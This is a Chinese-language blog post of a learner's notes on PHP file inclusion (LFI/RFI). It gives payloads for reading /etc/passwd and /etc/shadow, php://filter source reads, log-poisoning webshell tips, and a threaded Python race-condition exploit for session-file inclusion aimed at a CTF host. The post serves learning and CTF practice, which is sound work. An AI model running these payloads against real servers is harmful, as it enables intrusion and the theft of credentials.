

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/colourful.png">
  <link rel="icon" href="/img/colourful.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#4F4F4F">
  <meta name="author" content="Colourful">
  <meta name="keywords" content="">
  
    <meta name="description" content="因为是开始学的时候写的，可能有的知识点没学全，当时懵懵的，之后遇到了会有补充  文件包含漏洞一种注入型漏洞， 就是输入一段用户能够控制的脚本或者代码，并让服务端执行， 攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞  文件包含的函数include()程序一运行文件便会包含进来，若包含文件不存在产生致命错误，程序终止运行  include()函数不在意被包含的文件是什么类型">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含">
<meta property="og:url" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.html">
<meta property="og:site_name" content="Colourful">
<meta property="og:description" content="因为是开始学的时候写的，可能有的知识点没学全，当时懵懵的，之后遇到了会有补充  文件包含漏洞一种注入型漏洞， 就是输入一段用户能够控制的脚本或者代码，并让服务端执行， 攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞  文件包含的函数include()程序一运行文件便会包含进来，若包含文件不存在产生致命错误，程序终止运行  include()函数不在意被包含的文件是什么类型">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005822135.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005827876.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005833210.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005840481.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005844358.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005856602.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005902759.png">
<meta property="og:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005910963.png">
<meta property="article:published_time" content="2026-01-23T16:48:33.000Z">
<meta property="article:modified_time" content="2026-01-30T16:01:01.420Z">
<meta property="article:author" content="Colourful">
<meta property="article:tag" content="文件包含">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://colourful228.github.io/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005822135.png">
<meta name="twitter:creator" content="@Colorful">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>文件包含 - Colourful</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/custom/LabelPage/LabelPage.js.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"colourful228.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2026-01-09T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->

    

<style type="text/css">
  @keyframes spin3D {
    from {
      transform: rotate3d(0.5, 0.5, 0.5, 360deg);
    }

    to {
      transform: rotate3d(0deg);
    }
  }

  #loading {
    height: 100%;
    background-color: #172d4781;
    backdrop-filter: saturate(100%) blur(10px);
    display: flex;
    justify-content: center;
    align-items: center;
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    overflow: hidden;
    z-index: 99999999;
  }

  .spinner-box {
    width: 300px;
    height: 300px;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: transparent;
  }

  .leo {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    border-radius: 50%;
  }

  .blue-orbit {
    width: 175px;
    height: 175px;
    border: 2px solid #1a91fa;
    animation: spin3D 3s linear .2s infinite;
  }

  .green-orbit {
    width: 135px;
    height: 135px;
    border: 2px solid #00ffdd;
    animation: spin3D 2s linear 0s infinite;
  }

  .red-orbit {
    width: 100px;
    height: 100px;
    border: 2px solid #d75151;
    animation: spin3D 1s linear 0s infinite;
  }

  .white-orbit-a {
    width: 70px;
    height: 70px;
    border: 1px solid #faf5f5;
    animation: spin3D 3s linear 0s infinite;
  }

  .white-orbit-b {
    width: 70px;
    height: 70px;
    border: 1px solid #faf5f5;
    animation: spin3D 1.5s linear 0s infinite;
  }

  .nucleus {
    width: 1px;
    height: 1px;
    border: 1px solid #ffffff;
    animation: spin3D 1s linear 0s infinite;
  }
</style>

<div id="loading">
    <div class="spinner-box">
        <div class="blue-orbit leo"></div>
        <div class="green-orbit leo"></div>
        <div class="red-orbit leo"></div>
        <div class="white-orbit-a leo"></div>
        <div class="white-orbit-b leo"></div>
        <div class="nucleus leo"></div>
    </div>
</div>

<script>
  (function () {
    const loaded = function () {
      window.onload = function () {
        const loader = document.getElementById("loading");
        loader.className = "fadeout";
        setTimeout(function () {
            loader.style.display = "none";
          },
                500
        );
      }
    };
    loaded();
  })();
</script>



  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Colorful的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/M.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件包含"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Colourful
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-01-24 00:48" pubdate>
          2026年1月24日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          25 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">文件包含</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2026-01-31T00:01:01+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>因为是开始学的时候写的，可能有的知识点没学全，当时懵懵的，之后遇到了会有补充</p>
</blockquote>
<h1 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h1><p>一种注入型漏洞， 就是输入一段用户能够控制的脚本或者代码，并让服务端执行， 攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞 </p>
<h1 id="文件包含的函数"><a href="#文件包含的函数" class="headerlink" title="文件包含的函数"></a>文件包含的函数</h1><h2 id="include"><a href="#include" class="headerlink" title="include()"></a>include()</h2><p>程序一运行文件便会包含进来，若包含文件不存在产生致命错误，程序终止运行</p>
<p> include()函数不在意被包含的文件是什么类型，只要有php代码，都会被解析出来  </p>
<h2 id="require"><a href="#require" class="headerlink" title="require()"></a>require()</h2><p>与include相似，但如果文件不存在会抛出致命错误并终止程序</p>
<h2 id="include-once"><a href="#include-once" class="headerlink" title="include_once()"></a>include_once()</h2><p>确保同一个文件只被包含一次，避免重复定义函数或变量</p>
<h2 id="require-once"><a href="#require-once" class="headerlink" title="require_once()"></a>require_once()</h2><p>与require相似，但同样确保文件只被包含一次</p>
<h1 id="本地文件包含漏洞（LFI）"><a href="#本地文件包含漏洞（LFI）" class="headerlink" title="本地文件包含漏洞（LFI）"></a>本地文件包含漏洞（LFI）</h1><p> 能够打开并包含本地文件的漏洞（小皮暂时没搭成功）</p>
<h2 id="获取本地信息的方法"><a href="#获取本地信息的方法" class="headerlink" title="获取本地信息的方法"></a>获取本地信息的方法</h2><p>1、使用绝对路径</p>
<p>2、使用相对路径读取</p>
<p> 通过.&#x2F;表示当前位置路径，…&#x2F;表示上一级路径位置，在linux中同样适用，类似于目录遍历</p>
<p>3、一些常见的敏感目录信息路径</p>
<p> Linux&#x2F;Unix系统</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/etc/</span>passwd：账户信息  <br><br><span class="hljs-regexp">/etc/</span>shadow：账户密码信息  <br><br><span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/app/</span>php5<span class="hljs-regexp">/lib/</span>php.ini：PHP相关配置  <br><br><span class="hljs-regexp">/etc/</span>httpd<span class="hljs-regexp">/conf/</span>httpd.conf：Apache配置文件  <br><br><span class="hljs-regexp">/etc/my</span>.conf：mysql配置文件  <br></code></pre></td></tr></table></figure>

<p>Windows系统</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">C:</span>\boot.ini：查看系统版本<br><br><span class="hljs-symbol">C:</span>\ProgramFiles\mysql\my.ini：Mysql配置  <br></code></pre></td></tr></table></figure>



<h2 id="LFI漏洞利用技巧"><a href="#LFI漏洞利用技巧" class="headerlink" title="LFI漏洞利用技巧"></a>LFI漏洞利用技巧</h2><p>利用条件</p>
<ul>
<li>include()等函数通过动态变量的方式引入包含文件  </li>
<li>用户能够控制该动态变量</li>
</ul>
<h3 id="1、读取敏感文件"><a href="#1、读取敏感文件" class="headerlink" title="1、读取敏感文件"></a>1、读取敏感文件</h3><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?参</span>数名=<span class="hljs-regexp">/etc/passwd</span><br></code></pre></td></tr></table></figure>



<h3 id="2、利用伪协议读源码"><a href="#2、利用伪协议读源码" class="headerlink" title="2、利用伪协议读源码"></a>2、利用伪协议读源码</h3><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">?参数名=php://<span class="hljs-built_in">filter</span>/<span class="hljs-built_in">read</span>=<span class="hljs-built_in">convert</span>.base64-encode/resource=config.php<br></code></pre></td></tr></table></figure>



<h3 id="3、与文件上传配合使用"><a href="#3、与文件上传配合使用" class="headerlink" title="3、与文件上传配合使用"></a>3、与文件上传配合使用</h3><h3 id="4、包含Apache日志文件"><a href="#4、包含Apache日志文件" class="headerlink" title="4、包含Apache日志文件"></a>4、包含Apache日志文件</h3><p> 有时候网站存在文件包含漏洞，但是却没有文件上传点。这个时候我们还可以通过利用Apache的日志文件来生成一句话木马。  </p>
<p>利用条件</p>
<ul>
<li>对日志文件可读</li>
<li>知道日志文件access.log的存储目录（ 默认位置：<code>/var/log/httpd/access_log</code>）</li>
</ul>
<p>注</p>
<ul>
<li>一般情况下日志存储目录会被修改，需要读取服务器配置文件（httpd，conf，nginx.conf等）或者根据phpinfo()中的信息来得知</li>
<li>日志记录的信息都可以被调整，如报错的等级或者内容格式</li>
</ul>
<h3 id="5、包含SESSION文件"><a href="#5、包含SESSION文件" class="headerlink" title="5、包含SESSION文件"></a>5、包含SESSION文件</h3><p>可以先根据尝试包含到SESSION文件，在根据文件内容寻找可控变量，在构造payload插入到文件中，最后包含即可。</p>
<p>利用条件</p>
<ul>
<li>找到Session内的可控变量</li>
<li>Session文件可读写，并且指定存储路径</li>
</ul>
<p>php的session文件的保存路径可以在phpinfo中 session.save_path看到</p>
<p><strong>Session常见存储路径</strong></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/var/</span>lib<span class="hljs-regexp">/php/</span>sess_PHPSESSID<br><br><span class="hljs-regexp">/var/</span>lib<span class="hljs-regexp">/php/</span>sess_PHPSESSID<br><br><span class="hljs-regexp">/tmp/</span>sess_PHPSESSID<br><br><span class="hljs-regexp">/tmp/</span>sessions/sess_PHPSESSID<br></code></pre></td></tr></table></figure>

<p>session文件格式:sess_[phpsessid],而phpsessid在发送的请求的cookie字段中可以看到</p>
<p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># coding=utf-8</span><br><span class="hljs-keyword">import</span> io<br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> threading<br><br><span class="hljs-comment"># 目标URL</span><br>target_url = <span class="hljs-string">&quot;http://e8451baf-2c21-4349-9b8a-c2d43398e0af.node5.buuoj.cn:81/flflflflag.php&quot;</span><br><span class="hljs-comment"># 自定义SESSIONID</span><br>sessid = <span class="hljs-string">&#x27;exp&#x27;</span><br><span class="hljs-comment"># 要执行的命令</span><br><span class="hljs-comment"># data = &#123;&quot;cmd&quot;: &quot;system(&#x27;ls&#x27;);&quot;&#125;</span><br><br><span class="hljs-comment"># 持续向服务器发送请求</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">write</span>(<span class="hljs-params">session</span>):<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        <span class="hljs-comment"># 创建一个50KB的内存文件</span><br>        f = io.BytesIO(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">1024</span> * <span class="hljs-number">50</span>)<br>        <span class="hljs-comment"># 向目标URL发送请求</span><br>        resp = session.post(<br>            target_url,<br>            data=&#123;<span class="hljs-string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="hljs-string">&#x27;&lt;?php phpinfo();?&gt;&#x27;</span>&#125;,<br>            <span class="hljs-comment"># 模拟上传文件，触发PHP_SESSION_UPLOAD_PROGRESS处理</span><br>            files=&#123;<span class="hljs-string">&#x27;file&#x27;</span>: (<span class="hljs-string">&#x27;test.txt&#x27;</span>, f)&#125;,<br>            <span class="hljs-comment"># 设置PHPSESSID</span><br>            cookies=&#123;<span class="hljs-string">&#x27;PHPSESSID&#x27;</span>: sessid&#125;<br>        )<br><br><span class="hljs-comment"># 持续尝试触发并读取命令执行结果</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">read</span>(<span class="hljs-params">session</span>):<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        <span class="hljs-comment"># 尝试读取/tmp下创建的会话文件sess_exp</span><br>        resp = session.post(<br>            target_url+ <span class="hljs-string">&#x27;?file=/tmp/sess_&#x27;</span> + sessid,<br>            <span class="hljs-comment"># data=data</span><br>        )<br>        <span class="hljs-comment"># 如果响应中包含test.txt，说明命令执行成功，打印结果并清除事件标志</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;test.txt&#x27;</span> <span class="hljs-keyword">in</span> resp.text:<br>            <span class="hljs-built_in">print</span>(resp.text)<br>            event.clear()<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+++++++++++++]retry&quot;</span>)<br><br><span class="hljs-comment"># 多线程进行条件竞争</span><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    event = threading.Event()<br>    <span class="hljs-keyword">with</span> requests.session() <span class="hljs-keyword">as</span> session:<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">30</span>):<br>            threading.Thread(target=write, args=(session,)).start()<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">30</span>):<br>            threading.Thread(target=read, args=(session,)).start()<br>        event.<span class="hljs-built_in">set</span>()<br></code></pre></td></tr></table></figure>

<h3 id="6、包含临时文件"><a href="#6、包含临时文件" class="headerlink" title="6、包含临时文件"></a>6、包含临时文件</h3><p> php中上传文件，会创建临时文件。在linux下使用&#x2F;tmp目录，而在windows下使用C:\windows\temp目录。  </p>
<h1 id="远程文件包含-RFI"><a href="#远程文件包含-RFI" class="headerlink" title="远程文件包含(RFI)"></a>远程文件包含(RFI)</h1><p>漏洞利用条件（phpinfo中查看）</p>
<ul>
<li>allow_url_incude  on</li>
<li>allow_url_fopen  on</li>
</ul>
<p>则include和require函数是可以加载远程文件的</p>
<p>访问本地目录下的phpinfo.php文件，若该页面没有对$path做任何过滤，因此存在文件包含漏洞</p>
<p>可以在远端Web服务器&#x2F;site&#x2F;目录下创建一个test.php文件，内容为phpinfo()，利用漏洞去读取这个文件。  </p>
<p> 如果test.php是恶意的webshell文件，那么利用该漏洞就可以获取到服务器权限即允许攻击者远程执行恶意代码</p>
<h2 id="例题CTFHub"><a href="#例题CTFHub" class="headerlink" title="例题CTFHub"></a>例题CTFHub</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs javascript"> &lt;?php<br><span class="hljs-title function_">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">if</span> (<span class="hljs-title function_">isset</span>($_GET[<span class="hljs-string">&#x27;file&#x27;</span>])) &#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-title function_">strpos</span>($_GET[<span class="hljs-string">&quot;file&quot;</span>], <span class="hljs-string">&quot;flag&quot;</span>)) &#123;<br>        include $_GET[<span class="hljs-string">&quot;file&quot;</span>];<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        echo <span class="hljs-string">&quot;Hacker!!!&quot;</span>;<br>    &#125;<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-title function_">highlight_file</span>(__FILE__);<br>&#125;<br>?&gt;<br></code></pre></td></tr></table></figure>

<p>查看phpinfo</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005822135.png" srcset="/img/loading.gif" lazyload alt="image-20260124005822135"></p>
<p>两个都是on满足利用条件</p>
<p>bp抓包</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005827876.png" srcset="/img/loading.gif" lazyload alt="image-20260124005827876"></p>
<p>执行php代码</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005833210.png" srcset="/img/loading.gif" lazyload alt="image-20260124005833210"></p>
<h1 id="日志文件包含（日志注入）"><a href="#日志文件包含（日志注入）" class="headerlink" title="日志文件包含（日志注入）"></a>日志文件包含（日志注入）</h1><p>日志注入是一种通过将恶意数据插入到应用程序的日志文件中来实施的攻击。当这些日志被其他系统或应用程序读取和解析时，攻击者的恶意数据可能会被执行。这种攻击通常利用了不安全的日志处理机制和文件包含漏洞的组合。</p>
<p>在网站中用f12，点击网络，查看请求的响应头上的server字段</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005840481.png" srcset="/img/loading.gif" lazyload alt="image-20260124005840481"> Nginx默认日志路径是var&#x2F;log&#x2F;nginx&#x2F;access.log（访问日志）或var&#x2F;log&#x2F;nginx&#x2F;error.log（错误日志)</p>
<p>Apache的访问日志文件记录了客户端的每次请求及服务器响应的相关信息，我们可以访问日志文件得到一些网站信息如访问记录，此时可以尝试在url里写入一句话木马，通常在bp里面修改User-Agent，因为直接在网站上get传参可能会被url编码，然后再用蚁剑连接</p>
<h3 id="Session文件包含"><a href="#Session文件包含" class="headerlink" title="Session文件包含"></a>Session文件包含</h3><p>当可以获取Session文件路径并且Session文件内容可控时，就可以通过包含session文件进行攻击</p>
<p>漏洞利用</p>
<p>1）获取Session文件所在位置</p>
<p>通过phpinfo的信息获取session的存储位置</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005844358.png" srcset="/img/loading.gif" lazyload alt="image-20260124005844358"></p>
<p> Linux中Session默认存储在&#x2F;var&#x2F;lib&#x2F;php&#x2F;session目录下</p>
<p>文件路径例如</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/var/</span>lib<span class="hljs-regexp">/php/</span><br><br><span class="hljs-regexp">/var/</span>lib<span class="hljs-regexp">/php/</span>sessions/<br><br><span class="hljs-regexp">/tmp/</span><br><br><span class="hljs-regexp">/tmp/</span>sessions/<br></code></pre></td></tr></table></figure>

<p>2）控制Session内容</p>
<h3 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h3><h4 id="php-filter"><a href="#php-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a>php:&#x2F;&#x2F;filter</h4><p>过滤器，用于读取源码</p>
<p>格式：</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">php://<span class="hljs-built_in">filter</span>/<span class="hljs-built_in">read</span>=<span class="hljs-built_in">convert</span>.base64-encode/resource=文件名<br></code></pre></td></tr></table></figure>

<p>使用的convert.base64-encode，是一种过滤器。</p>
<p>利用条件：</p>
<ul>
<li>allow_url_fopen ：off&#x2F;on</li>
<li>allow_url_include：off&#x2F;on</li>
</ul>
<h5 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a><strong>过滤器</strong></h5><h6 id="1）转换过滤器"><a href="#1）转换过滤器" class="headerlink" title="1）转换过滤器"></a><strong>1）转换过滤器</strong></h6><p>作用：对数据流进行编码，通常用来读取文件源码</p>
<p>常见的转换过滤器</p>
<ol>
<li><strong>base64</strong></li>
</ol>
<p>convert.base64-encode：将内容Base64编码</p>
<p>convert.base64-decode：将Base64内容解码</p>
<ol start="2">
<li><strong>引号可打印</strong></li>
</ol>
<p>convert.quoted-printable-encode：引号可打印编码</p>
<p>convert.quoted-printable-decode：引号可打印解码</p>
<ol start="3">
<li><strong>字符编码转换</strong></li>
</ol>
<p><code>convert.iconv.</code>目标编码&#x2F;源编码  例:convert.iconv.UTF-8&#x2F;GBK</p>
<p><code>convert.iconv.</code>源编码.目标编码  例:convert.iconv.UTF-8.UTF-16</p>
<h6 id="2）字符串过滤器"><a href="#2）字符串过滤器" class="headerlink" title="2）字符串过滤器"></a><strong>2）字符串过滤器</strong></h6><p>该类通常以string开头，对每个字符都进行同样方式的处理</p>
<ol>
<li><code>string.toupper</code>：转为大写</li>
<li><code>string.tolower</code>：转为小写</li>
<li><code>string.strip_tags</code>：用来处理掉读入的所有标签，例如XML的等等。在绕过死亡exit大有用处</li>
<li><code>string.rot13</code>：字符右移13位</li>
</ol>
